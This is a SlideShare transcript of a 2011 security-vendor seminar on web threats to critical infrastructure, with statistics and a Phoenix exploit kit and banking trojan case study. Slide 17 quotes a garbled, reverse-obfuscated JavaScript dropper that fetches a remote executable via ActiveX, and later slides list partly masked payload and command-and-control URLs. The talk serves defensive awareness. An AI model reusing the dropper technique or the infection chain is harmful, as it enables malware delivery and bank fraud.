Protect critical infrastructure by Patrick de Jong

1,058 views

Published on

Seminar by Patrick de Jong during Infosecurity.be 2011

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,058
On SlideShare
0
From Embeds
0
Number of Embeds
35
Actions
Shares
0
Downloads
30
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Protect critical infrastructure by Patrick de Jong

  1. 1. Protecting your critical infrastructureagainst web threatsPatrick de JongSales Engineer, Northern Europe
  2. 2. Agenda:• Critical infrastructure / web threats relation• What are we facing (some statistics) and why• Spreading the malware• How do ‘they’ stay undetected?• What harm can ‘they’ do?• An example (Phoenix + Banker trojan)• The message of the photo (opening slide)
  3. 3. Crititcal infrastructure Web threats?‘Everything’ got connected. Digitized control (remote) based on standard OS like Windows or Linux and using standard Ethernet , TCP/IP Proprietary boxes with push buttons and switches. without any networking/connectivity (later with proprietary OS and networks).
  4. 4. Crititcal infrastructure – Web threats
  5. 5. Some statistics (what are we facing) Web-based Threats Of new threats come 92% from the Web Increase in Web 671% Malware* over 2008 Web malware from legitimate 79,9% sites*** AV-test currently (01-2011) counted 50 million samples** Source: Websense
  6. 6. Some statistics(what are we facing) Web 2.0 Landscape Current AV catch Collaboration Under 40% rates* Tools Social Enterprise Networking SaaS Malware dead within Social Media WEB 2.0 Media Sharing 52% 24 hours** Interactive Client Sharing Applications Mass World-wide blended Comms 10 billion threat emails per day* Source: M86 SecurityLabs**Source: Panda Labs
  7. 7. Why? Driven by money.Just as Professional as Commercial Software 7
  8. 8. Why? Driven by money.Joint venture toolkits
  9. 9. Why? Driven by money.Data selling
  10. 10. Why? Mostly driven by money.Buying & Selling ‘victims’
  11. 11. Spreading the malwareemail spam and malicous websites
  12. 12. Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)
  13. 13. Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)• Attacker benefits from someone else’s traffic and reputation• Designed to defeat URL filtering & reputation software• Most malware is now spread via compromised legitimate sites
  14. 14. How ‘they’ stay undetected
  15. 15. How they stay undetectedEvasive techniques
  16. 16. How they stay undetectedEvasive techniques behind the scenes
  17. 17. How they stay undetectedCode obfuscation var fname = "C:mssync20.exe"; var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth"); RE(""); var _r = RE(";)tcejbo(tnemelEetaerc.tnemucod"); RE(";)r_,di(etubirttAtes.r_"); RE(";)63E92CF40C00-A389-0D11-3A56-655C69DB:dislc,dissalc(etubirttAtes.r_"); var is_ok= 0; try { var _s = RE(";),maerts.bdoda(tcejbOetaerC.r_"); is_ok= 1; } catch(e){} function RE(s) { return eval(RV(s)); } if (is_ok!= 1) { function RV(s) try { { var rev = ""; var _s = RE(";)maerts.bdoda(tcejbOXevitcA wen"); is_ok= 1; (i = 0; i < s.length; i++) for } { catch(e){} rev = s.charAt(i) + rev; } } return rev; }
  18. 18. How they stay undetectedCode obfuscation Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)
  19. 19. How they stay undetectedDynamic code obfuscation
  20. 20. How they stay undetectedDynamic code obfuscation
  21. 21. How they stay undetectedPrivate exploit encryption NeoSploit Infection process … <malicious IFRAME>… Generating obfuscated JS Generating key and sending it to the server Using the key to generate an encrypted script that is sent back to the client The browser opens the encrypted script with key and executes the JS code
  22. 22. Toolkits/Trojans/C&CWhat can they do with it
  23. 23. Toolkits/Trojans/C&CWhat can they do with it
  24. 24. Example: banking trojanMoney mules
  25. 25. Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv ….Using stolen FTP accounts, the cyber gang managed to inject an Iframethat leads to the Phoenix Exploit Kit on thousands of legitimatewebsites
  26. 26. Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv …. The website content contains The user accesses to a compromised website redirection to the Phoenix Exploit KitThe user is redirected to the Phoenix Exploit Kit 2.3http://fan******.net/.ph/5 the payload was downloaded successfully The user’s PC exploited,
  27. 27. Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv ….This specific configuration file contains injection ordersthat will be used when the user accesses to the bank Compromised website The malware downloads a configuration file from: hxxp://uste*****.com.tr/Scripts/rd.bin
  28. 28. Example: banking trojan Legitimate Websites: The gang doesn’t want to uncover the video2mp3.net msgdiscovery.com main C&C to the world and uses the everythingon.tv Exploit Kit server as a proxy to the main …. C&C server After successful connection test, the bot reports Compromised Google the C&C server about new installation to: website hxxp://195.***.**.147:3128/data/set.php Before the Trojan accesses to the Command & Control server it verifies the user’s PC is connected to the internet. http://google.com/webhp
  29. 29. Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv …. Compromised Google website Besides the Trojan banker, the server sends the user another The gang operates in multiple vectors, using social malware – Fake AV engineering it tries to convince the user to buy fake AV
  30. 30. Example: banking trojan The Trojan adds a script (on the client site) to every page in the website. Of course the script is not located on the server, Financial and the user is redirected to the C&C to download it: institution The Trojan holds until the user accesses the bank hxxp://cheap********card.info/brap/bscript.js
  31. 31. Example: banking trojan From that point the Trojan supervises all user activity with the bank. The moment at which the user tries to commit a transaction, the bot communicates with the C&C and receives full information about the new transaction that the bot is intending to commit. Financial The bot replaces the details in the ‘transaction institution submit form’ and sends it to the server
  32. 32. Example: banking trojan Financial An example of a successful transaction generated by institution the Trojan to the money mule account
  33. 33. The photo
  34. 34. Patrick de JongSales Engineer Northern EuropePhone: +31 33 454 3533Mobile: +31 6 1373 2964Email: patrick.dejong@m86security.com

×